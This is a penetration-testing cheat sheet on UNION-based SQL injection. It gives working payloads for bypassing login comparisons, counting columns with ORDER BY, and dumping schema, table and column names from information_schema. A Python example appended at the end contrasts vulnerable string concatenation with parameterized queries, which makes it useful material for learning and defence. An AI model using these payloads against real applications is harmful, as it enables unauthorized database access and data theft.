SQL & LFI

if you find a SQL vuln in an application, try UNION injection

if the basic "admin'-- -" is possible, that means the query will look like

SELECT * FROM USERS WHERE FIRST_NAME = 'userinput'-- -'

so the input controls everything after the WHERE comparison, and anything that is valid SQL at that point can be appended

In this example below, we've got ID, Name, Position, Phone No, and Email data

Try admin' UNION SELECT NULL,NULL,.... -- - and watch in Burp for any weird behavior (data breaking, byte changes)

or do admin' ORDER BY 1, ORDER BY 2.....

If it breaks, that means the query can only handle the number before the error, i.e. that is the column count.

Now, we can extract useful data from the database!

try database()

Information_schema.tables

extract data from columns, tables

  1. UNION SELECT SCHEMA_NAME,2,3,4,5,6 FROM information_schema.schemata -- -

if you can't extract multiple values at once, try

' UNION SELECT group_concat(SCHEMA_NAME),2,3,4,5,6 FROM information_schema.schemata-- -

What tables are in the user database?

group_concat(TABLE_NAME) FROM information_schema.tables where table_schema = "Staff"-- -

Once we know the table names, extract the column names

group_concat(COLUMN_NAME),2,3,4,5,6 FROM information_schema.columns where table_schema = "Staff"-- -

displaying table and column names

group_concat(TABLE_NAME,":",COLUMN_NAME),2,3,4,5,6 FROM information_schema.columns where table_schema = "Staff" and table_name ="Users"-- -
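
Defender's view of the probes above, as an added example (not from the original notes): the same lookup built by string concatenation and with a bound parameter, run against the admin'-- -, UNION SELECT NULL and ORDER BY inputs. It uses Python's sqlite3 with an in-memory table so it runs offline; the users table, its columns and the sample rows are constructed for the example, while the notes use MySQL functions, where the bound-parameter fix is the same.

```python
import sqlite3

# Constructed sample data; table name, columns and rows are assumptions for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, position TEXT, phone TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        (1, "admin", "Manager", "555-0100", "admin@example.test"),
        (2, "bob", "Clerk", "555-0101", "bob@example.test"),
    ])
    return db

def lookup_concat(db, user_input):
    # Vulnerable: the input is pasted into the SQL text, so a quote ends the
    # string literal and the rest of the input is parsed as SQL.
    sql = "SELECT * FROM users WHERE name = '" + user_input + "'"
    return db.execute(sql).fetchall()

def lookup_param(db, user_input):
    # Hardened: the driver binds the input as a value; it is never parsed as SQL.
    return db.execute("SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()

def compare(db, user_input):
    """Return (concat_result, param_result); a DB error is reported as its class name."""
    out = []
    for fn in (lookup_concat, lookup_param):
        try:
            out.append(fn(db, user_input))
        except sqlite3.Error as exc:
            out.append(type(exc).__name__)
    return tuple(out)

# Inputs taken from the notes above (5 NULLs to match the 5 sample columns).
PROBES = [
    "admin",
    "admin'-- -",
    "admin' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -",
    "admin' ORDER BY 5-- -",
    "admin' ORDER BY 6-- -",
]

if __name__ == "__main__":
    db = make_db()
    for p in PROBES:
        vuln, safe = compare(db, p)
        print(f"{p!r}\n  concatenated : {vuln}\n  parameterized: {safe}")
```

With the bound parameter every probe returns no rows and no error, so neither the column-count trick nor the UNION has anything to work with.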
